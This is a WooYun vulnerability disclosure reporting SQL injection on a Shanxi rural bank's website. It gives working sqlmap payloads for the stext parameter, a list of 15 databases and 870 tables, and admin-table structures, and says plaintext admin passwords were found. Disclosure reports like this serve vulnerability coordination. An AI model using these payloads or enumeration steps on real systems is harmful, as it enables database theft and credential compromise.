当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143214

漏洞标题:山西某农商行官网SQL注入导致15库上千表敏感信息泄露(一)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-25 11:34

修复时间:2015-11-14 09:04

公开时间:2015-11-14 09:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-25: 细节已通知厂商并且等待厂商处理中
2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-14: 细节向公众公开

简要描述:

多wooyun,多机会...

详细说明:

泽州农商行主站(http://www.zrcbank.top)存在SQL注入,导致15个数据库,1000多表敏感信息泄露...

漏洞证明:

泽州农商行主站地址:http://www.zrcbank.top

1主页面.png


SQL注入页面:http://www.zrcbank.top/group/1search.php
在输入框中输入aaa’后,点击查询,系统提示SQL警告

输入aaa报错了.png


怀疑此处stext参数可能存在注入

报错了.png


用工具来测试下,果然存在注入:

sqlmap identified the following injection points with a total of 83 HTTP(s) requests:
---
Place: GET
Parameter: stext
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: stext=-5119' OR (9907=9907)#
    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: stext=aaa' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7166757271,0x6745674350634e746f47,0x716f687071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: stext=aaa' AND 2871=BENCHMARK(5000000,MD5(0x564b7354)) AND 'TSje'='TSje
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0


一共包含15个数据库:

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [15]:
[*] apermin0320
[*] biweb
[*] cms1
[*] dedecmsv57gbksp1
[*] freecken
[*] hiked
[*] information_schema
[*] lanhuah
[*] mysql
[*] sjyrw
[*] test
[*] w7ims
[*] wechat
[*] zrcbank
[*] zrcmall


当前数据库为:apermin0320

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
current database:    'apermin0320'


apermin0320数据库包含870表(信息量不小啊!)

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
[870 tables]
+--------------------------------------+
| update                               |
| user                                 |
| accessbank                           |
| accessprepay                         |
| accesspreshou                        |
| accesstype                           |
| affair                               |
| bank                                 |
| bankzhuru                            |
| buyplanmain                          |
| buyplanmain_detail                   |
| buyplanmain_detail_color             |
| buyplanmain_mingxi                   |
| buyplanmain_tmp_color                |
| buyplanstate                         |
| calendar                             |
| calendar_type                        |
| callchuli                            |
| callertype                           |
| calltype                             |
| certificate                          |
| certificatetype                      |
| commlog                              |
| competeproduct                       |
| contact                              |
| contract_flag                        |
| crm_chance                           |
| crm_chance_rate                      |
| crm_contact                          |
| crm_customer_move                    |
| crm_dict_servicesources              |
| crm_dict_servicestatus               |
| crm_dict_servicetypes                |
| crm_feiyong_sq                       |
| crm_finishstate                      |
| crm_jieduan                          |
| crm_mytable                          |
| crm_mytable_notes                    |
| crm_mytable_wz                       |
| crm_mytable_xssx                     |
| crm_piaoju_type                      |
| crm_remember                         |
| crm_service                          |
| crm_shenhezhuangtai                  |
| crm_shenqingbaobei                   |
| crm_zhuangtai                        |
| customer                             |
| customer_fangan                      |
| customer_xuqiu                       |
| customerarea                         |
| customerbelong                       |
| customerdefinetype                   |
| customerlever                        |
| customerorigin                       |
| customerproduct                      |
| customerproduct_detail               |
| customs_ranking_list                 |
| department                           |
| dict_countrycode                     |
| dict_danyuanyongtu                   |
| dict_danyuanzhuangtai                |
| dict_education                       |
| dict_huxing                          |
| dict_notify                          |
| dict_satisfaction                    |
| dict_shiyongleixing                  |
| dict_weekday                         |
| dict_xingbie                         |
| dict_xingzheng_qingjia               |
| dict_zhengjianleixing                |
| dorm_area                            |
| dorm_building                        |
| ecs_account_log                      |
| ecs_ad                               |
| ecs_ad_custom                        |
| ecs_ad_position                      |
| ecs_admin_action                     |
| ecs_admin_log                        |
| ecs_admin_message                    |
| ecs_admin_user                       |
| ecs_adsense                          |
| ecs_affiliate_log                    |
| ecs_agency                           |
| ecs_area_region                      |
| ecs_article                          |
| ecs_article_cat                      |
| ecs_attribute                        |
| ecs_auction_log                      |
| ecs_auto_manage                      |
| ecs_back_goods                       |
| ecs_back_order                       |
| ecs_bonus_type                       |
| ecs_booking_goods                    |
| ecs_brand                            |
| ecs_card                             |
| ecs_cart                             |
| ecs_cart_combo                       |
| ecs_cat_recommend                    |
| ecs_category                         |
| ecs_collect_goods                    |
| ecs_comment                          |
| ecs_commission                       |
| ecs_crons                            |
| ecs_delivery_goods                   |
| ecs_delivery_order                   |
| ecs_email_list                       |
| ecs_email_sendlist                   |
| ecs_error_log                        |
| ecs_exchange_goods                   |
| ecs_favourable_activity              |
| ecs_feedback                         |
| ecs_friend_link                      |
| ecs_goods                            |
| ecs_goods_activity                   |
| ecs_goods_article                    |
| ecs_goods_attr                       |
| ecs_goods_cat                        |
| ecs_goods_gallery                    |
| ecs_goods_type                       |
| ecs_group_goods                      |
| ecs_keywords                         |
| ecs_link_goods                       |
| ecs_mail_templates                   |
| ecs_member_price                     |
| ecs_nav                              |
| ecs_order_action                     |
| ecs_order_goods                      |
| ecs_order_info                       |
| ecs_pack                             |
| ecs_package_goods                    |
| ecs_pay_log                          |
| ecs_payment                          |
| ecs_plugins                          |
| ecs_products                         |
| ecs_reg_extend_info                  |
| ecs_reg_fields                       |
| ecs_region                           |
| ecs_role                             |
| ecs_searchengine                     |
| ecs_seller_category                  |
| ecs_seller_extend_info               |
| ecs_seller_fields                    |
| ecs_seller_nav                       |
| ecs_seller_shopbg                    |
| ecs_seller_shopheader                |
| ecs_seller_shopinfo                  |
| ecs_seller_shopslide                 |
| ecs_seller_shopwindow                |
| ecs_sessions                         |
| ecs_sessions_data                    |
| ecs_shipping                         |
| ecs_shipping_area                    |
| ecs_shop_config                      |
| ecs_snatch_log                       |
| ecs_stats                            |
| ecs_store_category                   |
| ecs_street_tags                      |
| ecs_suppliers                        |
| ecs_tag                              |
| ecs_template                         |
| ecs_topic                            |
| ecs_touch_activity                   |
| ecs_touch_ad                         |
| ecs_touch_ad_position                |
| ecs_touch_article                    |
| ecs_touch_article_cat                |
| ecs_touch_auth                       |
| ecs_touch_brand                      |
| ecs_touch_category                   |
| ecs_touch_feedback                   |
| ecs_touch_goods                      |
| ecs_touch_goods_activity             |
| ecs_touch_nav                        |
| ecs_touch_payment                    |
| ecs_touch_shop_config                |
| ecs_touch_user_info                  |
| ecs_user_account                     |
| ecs_user_address                     |
| ecs_user_bonus                       |
| ecs_user_feed                        |
| ecs_user_rank                        |
| ecs_user_seller                      |
| ecs_users                            |
| ecs_virtual_card                     |
| ecs_volume_price                     |
| ecs_vote                             |
| ecs_vote_log                         |
| ecs_vote_option                      |
| ecs_wechat                           |
| ecs_wechat_custom_message            |
| ecs_wechat_extend                    |
| ecs_wechat_mass_history              |
| ecs_wechat_media                     |
| ecs_wechat_menu                      |
| ecs_wechat_point                     |
| ecs_wechat_prize                     |
| ecs_wechat_qrcode                    |
| ecs_wechat_reply                     |
| ecs_wechat_rule_keywords             |
| ecs_wechat_user                      |
| ecs_wechat_user_group                |
| ecs_weixin_bonus                     |
| ecs_weixin_cfg                       |
| ecs_weixin_config                    |
| ecs_weixin_keywords                  |
| ecs_weixin_lang                      |
| ecs_weixin_menu                      |
| ecs_weixin_point                     |
| ecs_weixin_point_record              |
| ecs_weixin_user                      |
| ecs_wholesale                        |
| email                                |
| emailstate                           |
| exchange                             |
| fahuodan                             |
| fahuodan_detail                      |
| fahuostate                           |
| fahuotype                            |
| feiyongclass                         |
| feiyongrecord                        |
| feiyongtype                          |
| fixedasset                           |
| fixedassetbaofei                     |
| fixedassetgroup                      |
| fixedassetin                         |
| fixedassetleibie                     |
| fixedassetout                        |
| fixedassetstatus                     |
| fixedassettiaoku                     |
| fixedassettui                        |
| fixedassetweixiu                     |
| fukuanplan                           |
| fukuanrecord                         |
| gb_marriage                          |
| gb_national                          |
| gb_political                         |
| gb_sex                               |
| hk_cityclass                         |
| hk_deal                              |
| hk_deal_item                         |
| hk_deal_log                          |
| hk_delivery                          |
| hk_delivery_notice                   |
| hk_goods                             |
| hk_goodsclass                        |
| hk_hoteluser                         |
| hk_mobilecode                        |
| hk_payment                           |
| hk_payment_form                      |
| hk_payment_notice                    |
| hk_region                            |
| hk_search_user                       |
| hk_user                              |
| hk_useraddress                       |
| hk_work                              |
| hkfood_admin                         |
| hkfood_cityclass                     |
| hkfood_deal                          |
| hkfood_deal_item                     |
| hkfood_deal_short_copy               |
| hkfood_goods                         |
| hkfood_shop                          |
| hkfood_shopadmin                     |
| hrms_boolean                         |
| hrms_educationalexperience           |
| hrms_expense                         |
| hrms_expense_type                    |
| hrms_file                            |
| hrms_file_fuzhi                      |
| hrms_file_lizhi                      |
| hrms_file_luyong                     |
| hrms_laboringskill                   |
| hrms_r_p                             |
| hrms_r_p_name                        |
| hrms_r_p_status                      |
| hrms_reward_punishment               |
| hrms_socialrelation                  |
| hrms_transfer                        |
| hrms_transfer_type                   |
| hrms_work_status                     |
| hrms_worker_hetong                   |
| hrms_worker_zhengzhao                |
| hrms_worker_zhicheng                 |
| hrms_workexperience                  |
| hrms_zhiwei_status                   |
| hrms_zpjihua                         |
| hrms_zprencaiku                      |
| huikuanplan                          |
| huikuanrecord                        |
| ifneed                               |
| important                            |
| ims_activity                         |
| ims_activity_day                     |
| ims_activity_guest                   |
| ims_activity_mail                    |
| ims_activity_note                    |
| ims_activity_reply                   |
| ims_activity_user                    |
| ims_article                          |
| ims_article_category                 |
| ims_article_reply                    |
| ims_attachment                       |
| ims_award                            |
| ims_award_list                       |
| ims_baoming_list                     |
| ims_baoming_reply                    |
| ims_basic_reply                      |
| ims_bigpan_award                     |
| ims_bigpan_reply                     |
| ims_bigpan_winner                    |
| ims_bigwheel_award                   |
| ims_bigwheel_fans                    |
| ims_bigwheel_reply                   |
| ims_bless_card                       |
| ims_bless_reply                      |
| ims_business                         |
| ims_cache                            |
| ims_card                             |
| ims_card_coupon                      |
| ims_card_log                         |
| ims_card_members                     |
| ims_card_members_coupon              |
| ims_card_password                    |
| ims_chengji                          |
| ims_community_admap                  |
| ims_community_advertisement          |
| ims_community_announcement           |
| ims_community_express_company        |
| ims_community_express_fee            |
| ims_community_express_order          |
| ims_community_manager                |
| ims_community_member                 |
| ims_community_phone                  |
| ims_community_region                 |
| ims_community_reply                  |
| ims_community_report                 |
| ims_community_service                |
| ims_community_servicecategory        |
| ims_community_verifycode             |
| ims_cover_reply                      |
| ims_credit_log                       |
| ims_credit_request                   |
| ims_cyd_award                        |
| ims_cyd_reply                        |
| ims_cyd_winner                       |
| ims_default_reply_log                |
| ims_dqq_award                        |
| ims_dqq_reply                        |
| ims_dqq_winner                       |
| ims_duanwu_dianzan                   |
| ims_duanwu_fans                      |
| ims_duanwu_show                      |
| ims_egg_award                        |
| ims_egg_reply                        |
| ims_egg_winner                       |
| ims_exam_choice                      |
| ims_exam_desc                        |
| ims_exam_paper                       |
| ims_fans                             |
| ims_fans_2                           |
| ims_fuli                             |
| ims_fuli_reply                       |
| ims_fuli_rows                        |
| ims_game                             |
| ims_game2048_reply                   |
| ims_game_category                    |
| ims_game_img                         |
| ims_groupon_fans                     |
| ims_groupon_list                     |
| ims_groupon_order                    |
| ims_groupon_set                      |
| ims_hlzonyu_data                     |
| ims_hlzonyu_list                     |
| ims_hlzonyu_log                      |
| ims_hlzonyu_order                    |
| ims_hlzonyu_reply                    |
| ims_hotel2                           |
| ims_hotel2_brand                     |
| ims_hotel2_business                  |
| ims_hotel2_member                    |
| ims_hotel2_order                     |
| ims_hotel2_reply                     |
| ims_hotel2_room                      |
| ims_hotel2_room_price                |
| ims_hotel2_set                       |
| ims_hotel_order                      |
| ims_hotel_reply                      |
| ims_hotel_shop                       |
| ims_huabao                           |
| ims_huabao_item                      |
| ims_huabao_photo                     |
| ims_huabao_reply                     |
| ims_icard2_announce                  |
| ims_icard2_business                  |
| ims_icard2_card                      |
| ims_icard2_card_log                  |
| ims_icard2_coupon                    |
| ims_icard2_gift                      |
| ims_icard2_level                     |
| ims_icard2_money_log                 |
| ims_icard2_order                     |
| ims_icard2_outlet                    |
| ims_icard2_privilege                 |
| ims_icard2_reply                     |
| ims_icard2_score                     |
| ims_icard2_sign                      |
| ims_icard2_sncode                    |
| ims_icard2_style                     |
| ims_icard2_user                      |
| ims_icard_announce                   |
| ims_icard_business                   |
| ims_icard_card                       |
| ims_icard_card_log                   |
| ims_icard_coupon                     |
| ims_icard_gift                       |
| ims_icard_level                      |
| ims_icard_money_log                  |
| ims_icard_order                      |
| ims_icard_outlet                     |
| ims_icard_privilege                  |
| ims_icard_reply                      |
| ims_icard_score                      |
| ims_icard_sign                       |
| ims_icard_sncode                     |
| ims_icard_style                      |
| ims_icard_user                       |
| ims_idish_area                       |
| ims_idish_cart                       |
| ims_idish_category                   |
| ims_idish_email_setting              |
| ims_idish_goods                      |
| ims_idish_intelligent                |
| ims_idish_nave                       |
| ims_idish_order                      |
| ims_idish_order_goods                |
| ims_idish_print_setting              |
| ims_idish_reply                      |
| ims_idish_setting                    |
| ims_idish_sms_setting                |
| ims_idish_store_setting              |
| ims_idish_stores                     |
| ims_ifans_groupsend                  |
| ims_ishopping_address                |
| ims_ishopping_cart                   |
| ims_ishopping_category               |
| ims_ishopping_goods                  |
| ims_ishopping_order                  |
| ims_ishopping_order_goods            |
| ims_ishopping_setting                |
| ims_izc_lightbox_app                 |
| ims_izc_lightbox_book                |
| ims_izc_lightbox_comment             |
| ims_izc_lightbox_list                |
| ims_izc_lightbox_manage              |
| ims_izc_lightbox_page                |
| ims_izc_lightbox_reply               |
| ims_izclightbox_items                |
| ims_izclightbox_list                 |
| ims_izclightbox_reply                |
| ims_jdg_pub                          |
| ims_jdg_pub_chatcomments             |
| ims_jdg_pub_chatfans                 |
| ims_jdg_pub_clock                    |
| ims_jdg_pub_party                    |
| ims_jdg_pub_partycomments            |
| ims_jdg_pub_partyfans                |
| ims_jdg_pub_photos                   |
| ims_jdg_pub_photoslikeit             |
| ims_jdg_pub_rule                     |
| ims_jdg_pub_wineadmin                |
| ims_jdg_pub_winelog                  |
| ims_lxy_bigpan_award                 |
| ims_lxy_bigpan_reply                 |
| ims_lxy_bigpan_winner                |
| ims_lxy_bussiness_card               |
| ims_lxy_bussiness_card_class         |
| ims_lxy_bussiness_card_cop           |
| ims_lxy_bussiness_card_reply         |
| ims_lxy_bussiness_per_card           |
| ims_lxy_bussiness_per_card_class     |
| ims_lxy_bussiness_per_card_cop       |
| ims_lxy_bussiness_per_card_product   |
| ims_lxy_bussiness_per_card_reply     |
| ims_lxy_ecowzp                       |
| ims_lxy_ecowzp_list_add              |
| ims_lxy_ecowzp_order                 |
| ims_lxy_ecowzp_reply                 |
| ims_lxy_marry_info                   |
| ims_lxy_marry_list                   |
| ims_lxy_marry_reply                  |
| ims_lxy_wecs                         |
| ims_lxy_wecs2                        |
| ims_lxy_wecs3                        |
| ims_mailbox_list                     |
| ims_mailbox_reply                    |
| ims_mechat                           |
| ims_medias                           |
| ims_members                          |
| ims_members_group                    |
| ims_members_paylog                   |
| ims_members_permission               |
| ims_members_profile                  |
| ims_members_status                   |
| ims_menu_event                       |
| ims_message_list                     |
| ims_message_reply                    |
| ims_modules                          |
| ims_modules_bindings                 |
| ims_msg                              |
| ims_msg_reply                        |
| ims_multisearch                      |
| ims_multisearch_fields               |
| ims_multisearch_reply                |
| ims_multisearch_research             |
| ims_music_reply                      |
| ims_news_reply                       |
| ims_nowbig_reply                     |
| ims_nowbig_user                      |
| ims_nuqut_reply                      |
| ims_oauther                          |
| ims_oerrorlog                        |
| ims_ohost                            |
| ims_paylog                           |
| ims_profile_fields                   |
| ims_qrcode                           |
| ims_qrcode_stat                      |
| ims_quickexam2_choice                |
| ims_quickexam2_paper                 |
| ims_quickexam2_reply                 |
| ims_quickexam2_score_record          |
| ims_quickmusic_music                 |
| ims_quickmusic_reply                 |
| ims_quickmusic_tape                  |
| ims_quicksurvay_choice               |
| ims_quicksurvay_paper                |
| ims_quicksurvay_reply                |
| ims_quicksurvay_score_record         |
| ims_redpacket                        |
| ims_redpacket_award                  |
| ims_redpacket_firend                 |
| ims_redpacket_reply                  |
| ims_redpacket_setting                |
| ims_redpacket_token                  |
| ims_redpacket_user                   |
| ims_research                         |
| ims_research_data                    |
| ims_research_fields                  |
| ims_research_reply                   |
| ims_research_rows                    |
| ims_rule                             |
| ims_rule_keyword                     |
| ims_school                           |
| ims_school_class                     |
| ims_school_notice                    |
| ims_school_score                     |
| ims_school_set                       |
| ims_school_student                   |
| ims_school_teacher                   |
| ims_scratchcard_award                |
| ims_scratchcard_reply                |
| ims_scratchcard_winner               |
| ims_security_reply                   |
| ims_security_winner                  |
| ims_sessions                         |
| ims_settings                         |
| ims_shake_member                     |
| ims_shake_reply                      |
| ims_sharecards_category              |
| ims_sharecards_date                  |
| ims_sharecards_reply                 |
| ims_sheka_list                       |
| ims_sheka_reply                      |
| ims_sheka_zhufu                      |
| ims_shopping2_address                |
| ims_shopping2_cart                   |
| ims_shopping2_category               |
| ims_shopping2_express                |
| ims_shopping2_fans                   |
| ims_shopping2_goods                  |
| ims_shopping2_order                  |
| ims_shopping2_order_goods            |
| ims_shopping2_set                    |
| ims_shopping3_address                |
| ims_shopping3_cart                   |
| ims_shopping3_category               |
| ims_shopping3_express                |
| ims_shopping3_fans                   |
| ims_shopping3_fans_like              |
| ims_shopping3_genius                 |
| ims_shopping3_goods                  |
| ims_shopping3_order                  |
| ims_shopping3_order_goods            |
| ims_shopping3_set                    |
| ims_shopping_address                 |
| ims_shopping_adv                     |
| ims_shopping_cart                    |
| ims_shopping_category                |
| ims_shopping_dispatch                |
| ims_shopping_express                 |
| ims_shopping_feedback                |
| ims_shopping_goods                   |
| ims_shopping_goods_option            |
| ims_shopping_goods_param             |
| ims_shopping_order                   |
| ims_shopping_order_goods             |
| ims_shopping_product                 |
| ims_shopping_set                     |
| ims_shopping_spec                    |
| ims_shopping_spec_item               |
| ims_signup                           |
| ims_signup_data                      |
| ims_signup_fields                    |
| ims_signup_reply                     |
| ims_signup_rows                      |
| ims_site_nav                         |
| ims_site_slide                       |
| ims_site_styles                      |
| ims_site_templates                   |
| ims_smashegg_fans                    |
| ims_smashegg_reply                   |
| ims_sns                              |
| ims_sns_post                         |
| ims_sns_reply                        |
| ims_stat_keyword                     |
| ims_stat_msg_history                 |
| ims_stat_rule                        |
| ims_stonefish_chailihe_data          |
| ims_stonefish_chailihe_gift          |
| ims_stonefish_chailihe_reply         |
| ims_stonefish_chailihe_userlist      |
| ims_stonefish_grabgifts_awarding     |
| ims_stonefish_grabgifts_awardingtype |
| ims_stonefish_grabgifts_data         |
| ims_stonefish_grabgifts_gift         |
| ims_stonefish_grabgifts_giftmika     |
| ims_stonefish_grabgifts_reply        |
| ims_stonefish_grabgifts_userlist     |
| ims_tnhy_reply                       |
| ims_userapi_cache                    |
| ims_userapi_reply                    |
| ims_vote_fans                        |
| ims_vote_option                      |
| ims_vote_reply                       |
| ims_votes_fans                       |
| ims_votes_option                     |
| ims_votes_reply                      |
| ims_wcha_reply                       |
| ims_wechats                          |
| ims_wechats_modules                  |
| ims_weidim_item                      |
| ims_weidim_order                     |
| ims_weidim_reply                     |
| ims_weihaomwb_reply                  |
| ims_weihaomwb_user                   |
| ims_weishare                         |
| ims_weishare2                        |
| ims_weishare2_firend                 |
| ims_weishare2_reply                  |
| ims_weishare2_setting                |
| ims_weishare2_user                   |
| ims_weishare_firend                  |
| ims_weishare_reply                   |
| ims_weishare_setting                 |
| ims_weishare_user                    |
| ims_weivote_log                      |
| ims_weivote_option                   |
| ims_weivote_setting                  |
| ims_wish                             |
| ims_xcommunity_activity              |
| ims_xcommunity_admap                 |
| ims_xcommunity_advertisement         |
| ims_xcommunity_announcement          |
| ims_xcommunity_carpool               |
| ims_xcommunity_fled                  |
| ims_xcommunity_manager               |
| ims_xcommunity_member                |
| ims_xcommunity_navextension          |
| ims_xcommunity_phone                 |
| ims_xcommunity_property              |
| ims_xcommunity_region                |
| ims_xcommunity_reply                 |
| ims_xcommunity_report                |
| ims_xcommunity_res                   |
| ims_xcommunity_search                |
| ims_xcommunity_service               |
| ims_xcommunity_servicecategory       |
| ims_xcommunity_set                   |
| ims_xcommunity_slide                 |
| ims_xcommunity_verifycode            |
| ims_xhw_picvote                      |
| ims_xhw_picvote_log                  |
| ims_xhw_picvote_reg                  |
| ims_xhw_picvote_setting              |
| ims_yoby_kehu                        |
| ims_yoby_xiangmu                     |
| ims_yqs_award                        |
| ims_yqs_reply                        |
| ims_yqs_winner                       |
| ims_yyy_reply                        |
| ims_yyy_winner                       |
| ims_yyyonline_reply                  |
| ims_yyyonline_winner                 |
| info                                 |
| inorout                              |
| kaipiaorecord                        |
| kaipiaostate                         |
| linkman                              |
| measure                              |
| menu                                 |
| message                              |
| modifyrecord                         |
| notify                               |
| numzero                              |
| office_task                          |
| officeguihuanstate                   |
| officeproduct                        |
| officeproductbaofei                  |
| officeproductcangku                  |
| officeproductgroup                   |
| officeproductin                      |
| officeproductleibie                  |
| officeproductout                     |
| officeproducttiaoku                  |
| officeproducttui                     |
| paystate                             |
| phpshe_ad                            |
| phpshe_admin                         |
| phpshe_article                       |
| phpshe_ask                           |
| phpshe_cart                          |
| phpshe_category                      |
| phpshe_class                         |
| phpshe_collect                       |
| phpshe_comment                       |
| phpshe_link                          |
| phpshe_order                         |
| phpshe_orderdata                     |
| phpshe_page                          |
| phpshe_payway                        |
| phpshe_product                       |
| phpshe_setting                       |
| phpshe_user                          |
| product                              |
| productcolor                         |
| producttype                          |
| productzuzhuang                      |
| productzuzhuang2_detail              |
| productzuzhuang_detail               |
| productzuzhuangstate                 |
| property                             |
| salemode                             |
| salseman_ranking_list                |
| sellbilltype                         |
| sellcontract_jiaofu                  |
| sellplanmain                         |
| sellplanmain_detail                  |
| sellplanmain_detail_color            |
| sellplanstate                        |
| shoupiaorecord                       |
| sms_sendlist                         |
| ssu_loginadmin                       |
| ssu_shopplay                         |
| ssu_shopuser                         |
| ssu_shopuser_copy                    |
| ssu_shopuser_copy1                   |
| ssu_shopuser_youchu                  |
| ssu_shopvip                          |
| ssu_shopvip_youchu                   |
| stock                                |
| stockchangemain                      |
| stockchangemain_detail               |
| stockchangestate                     |
| stockinmain                          |
| stockinmain_detail                   |
| stockinmain_detail_color             |
| stockinmain_view                     |
| stockoutmain                         |
| stockoutmain_detail                  |
| stockoutmain_detail_color            |
| stockoutmain_view                    |
| store                                |
| store_color                          |
| store_init                           |
| store_product                        |
| storeaccesstype                      |
| storecheck                           |
| storecheck_detail                    |
| supply                               |
| supplylever                          |
| supplylinkman                        |
| supplyproduct                        |
| sys_code                             |
| sys_function                         |
| sys_menu                             |
| system_log                           |
| system_logall                        |
| system_logtype                       |
| systemconfig                         |
| systemhelp                           |
| systemlang                           |
| systemprivate                        |
| systemprivateconfig                  |
| systemprivateinc                     |
| systemtable                          |
| test                                 |
| tys_admin                            |
| tys_baozhuang                        |
| tys_car                              |
| tys_company                          |
| tys_danjiatype                       |
| tys_daozhan                          |
| tys_guige                            |
| tys_hetong                           |
| tys_hetong_detail                    |
| tys_pinming                          |
| tys_shangbiao                        |
| tys_shouhuo                          |
| tys_tielu                            |
| tys_xufang                           |
| tys_zhantai                          |
| tys_zhiliang                         |
| unit                                 |
| unitprop                             |
| user_priv                            |
| v_accessbank                         |
| v_accessprepay                       |
| v_accesspreshou                      |
| v_bankzhurutype                      |
| v_buyplanmain_detail                 |
| v_feiyong_sq                         |
| v_feiyongbaoxiao                     |
| v_feiyongclass                       |
| v_feiyongrecord                      |
| v_feiyongtype                        |
| v_sellcontract                       |
| v_sellcontract_plan                  |
| v_sellone                            |
| v_sellonedetail                      |
| v_sellplanmain_detail                |
| v_shouruclass                        |
| v_shoururecord                       |
| v_shourutype                         |
| v_supplyownmoney                     |
| v_workplanmain_detail                |
| v_yingkaipiaohuizong                 |
| v_yingshoukuanhuizong                |
| vip                                  |
| w                                    |
| workplanmain                         |
| workplanmain_detail                  |
| workplanshenhe                       |
| workplanstate                        |
| workreport                           |
| wygl_baoxiuxinxi                     |
| wygl_biaoxiuxiangmu                  |
| wygl_gongchenghetong                 |
| wygl_gongchengjindu                  |
| wygl_gongchengxinxi                  |
| wygl_pingjialeixing                  |
| wygl_weixiupingjia                   |
| yunfeitype                           |
| zhk_admin                            |
| zhk_city                             |
| zhk_content                          |
| zhk_content_zrc                      |
| zhk_ddz_cc                           |
| zhk_ddz_cc_copy                      |
| zhk_ddz_user                         |
| zhk_ddz_user2                        |
| zhk_picture                          |
+--------------------------------------+


那就挑其中几个表看下:
user表:
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
Table: user
[83 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| ADD_HOME | varchar(200) |
| AUTHORIZE | int(11) |
| AVATAR | varchar(20) |
| BBS_COUNTER | int(11) |
| BBS_SIGNATURE | text |
| BIND_IP | text |
| BIRTHDAY | date |
| BKGROUND | text |
| BP_NO | varchar(50) |
| BYNAME | varchar(20) |
| CALL_SOUND | char(2) |
| CANBROADCAST | int(11) |
| CONCERN_USER | text |
| DEPT_ID | int(11) |
| DEPT_ID_OTHER | text |
| DISABLED | int(11) |
| DUTY_TYPE | int(11) |
| EMAIL | varchar(50) |
| EMAIL_CAPACITY | int(11) |
| EmailAddress | varchar(100) |
| EmailPassword | varchar(100) |
| FAX_NO_DEPT | varchar(50) |
| FOLDER_CAPACITY | int(11) |
| FUNC_ID_STR | varchar(1000) |
| ICQ_NO | varchar(50) |
| IS_LUNAR | char(1) |
| KEY_SN | varchar(100) |
| LAST_PASS_TIME | datetime |
| LAST_VISIT_IP | varchar(100) |
| LAST_VISIT_TIME | datetime |
| leftmenu | varchar(50) |
| LIMIT_LOGIN | char(1) |
| MENU_EXPAND | char(2) |
| MENU_IMAGE | varchar(20) |
| MENU_TYPE | char(1) |
| MOBIL_NO | varchar(50) |
| MOBIL_NO_HIDDEN | char(1) |
| MOBILE_PS1 | varchar(50) |
| MOBILE_PS2 | varchar(50) |
| MOBILE_SP | varchar(50) |
| MSN | varchar(200) |
| MY_RSS | text |
| MY_STATUS | varchar(200) |
| MYTABLE_LEFT | varchar(200) |
| MYTABLE_RIGHT | varchar(200) |
| NICK_NAME | varchar(50) |
| NOT_LOGIN | varchar(20) |
| NOT_VIEW_TABLE | varchar(20) |
| NOT_VIEW_USER | varchar(20) |
| OICQ_NO | varchar(50) |
| ON_STATUS | char(1) |
| ONLINE | int(11) |
| PANEL | char(1) |
| PASSWORD | varchar(50) |
| PIC_ID | int(10) unsigned |
| POST_DEPT | text |
| POST_NO_HOME | varchar(50) |
| POST_PRIV | varchar(50) |
| REMARK | text |
| rightmenu | varchar(50) |
| SCORE | int(11) |
| SECURE_KEY_SN | varchar(20) |
| SEX | char(1) |
| SHORTCUT | text |
| SHOW_RSS | char(1) |
| SMS_ON | char(1) |
| SMTPServerIP | varchar(100) |
| TDER_FLAG | char(1) |
| TEL_NO_DEPT | varchar(50) |
| TEL_NO_HOME | varchar(50) |
| THEME | varchar(10) |
| UID | int(11) |
| UIN | int(10) unsigned |
| USEING_KEY | char(2) |
| USER_DEFINE | text |
| USER_ID | varchar(20) |
| USER_NAME | varchar(200) |
| USER_NO | int(11) |
| USER_PRIV | varchar(10) |
| USER_PRIV_OTHER | text |
| WEATHER_CITY | varchar(20) |
| WEBMAIL_CAPACITY | int(11) |
| WEBMAIL_NUM | int(11) |
+------------------+------------------+
网速慢数据太多,就没跑完...user表内容也很丰富啊
看一下zhk_admin表,这个表应该是管理员表

Database: apermin0320
Table: zhk_admin
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| password | varchar(500)     |
| username | varchar(500)     |
+----------+------------------+


dump下,后台管理员用户名密码都在这了,并且还是明文,醉了...

4.png


最后在看一个表:tys_admin(我又醉了,全是弱密码)

7.png


好吧,问题证明到此。

修复方案:

该!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-30 09:02

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无